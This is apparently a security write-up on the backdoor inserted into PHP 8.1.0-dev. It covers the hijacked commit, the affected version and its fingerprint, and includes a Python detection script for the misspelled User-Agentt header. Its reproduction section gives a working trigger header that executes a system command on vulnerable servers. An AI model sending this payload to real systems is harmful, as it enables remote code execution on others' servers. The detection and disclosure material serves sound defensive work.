PHP Zerodium Backdoor Vulnerability
Vulnerability Description
While analyzing one of the malicious commits, PHP developer Jake Birchall found that the backdoor injected into the code enabled remote code execution on a website running the hijacked PHP code, and that the attacker had used the name of a PHP developer to submit the commit.
So far, the PHP project has not disclosed more about the incident, saying that the specific details of how the server was hacked are still under investigation.
Vulnerability Impact
PHP 8.1.0-dev
Network fingerprint
"PHP/8.1.0-dev"
Vulnerability reproduction
The backdoor is triggered by adding a request header (yes, User-Agentt, not User-Agent):
User-Agentt: zerodiumsystem('id');
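For defenders, the misspelled header name is a reliable detection point. The following is an added example, not part of the original post: a Python check that flags requests carrying User-Agentt and responses advertising the PHP/8.1.0-dev banner. The function names, host name and sample traffic are constructed for illustration.

```python
import re
from typing import List, Optional, Tuple

# Header name from the write-up (note the doubled "t"); HTTP header names are case-insensitive.
BACKDOOR_HEADER = "user-agentt"
MARKER = "zerodium"
AFFECTED_BANNER = re.compile(r"PHP/8\.1\.0-dev", re.IGNORECASE)


def parse_headers(raw: str) -> List[Tuple[str, str]]:
    """Return (lowercased name, value) pairs from a raw HTTP message, skipping the start line."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    pairs = []
    for line in head.split("\n")[1:]:
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip().lower(), value.strip()))
    return pairs


def inspect_request(raw: str) -> Optional[str]:
    """'trigger' if the misspelled header carries the marker, 'suspicious' if the
    header is present without it, None if the request does not carry the header."""
    for name, value in parse_headers(raw):
        if name == BACKDOOR_HEADER:
            # Marker is matched case-insensitively to err on the side of alerting.
            return "trigger" if MARKER in value.lower() else "suspicious"
    return None


def runs_affected_build(raw_response: str) -> bool:
    """True if any response header (e.g. X-Powered-By or Server) advertises PHP/8.1.0-dev."""
    return any(AFFECTED_BANNER.search(v) for _, v in parse_headers(raw_response))


# Constructed sample traffic; "exploit" reuses the header line shown in the write-up.
SAMPLES = {
    "normal": "GET / HTTP/1.1\r\nHost: app.example\r\nUser-Agent: curl/8.0\r\n\r\n",
    "probe": "GET / HTTP/1.1\r\nHost: app.example\r\nuser-agentT: test\r\n\r\n",
    "exploit": "GET / HTTP/1.1\r\nHost: app.example\r\nUser-Agentt: zerodiumsystem('id');\r\n\r\n",
}
RESPONSE = "HTTP/1.1 200 OK\r\nX-Powered-By: PHP/8.1.0-dev\r\nContent-Type: text/html\r\n\r\n"

if __name__ == "__main__":
    for label, req in SAMPLES.items():
        print(label, "->", inspect_request(req))
    print("affected build:", runs_affected_build(RESPONSE))
```

Any hit on the header name alone is worth investigating, since legitimate clients do not send User-Agentt.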
Reverse shell
This post is licensed under CC BY 4.0 by the author.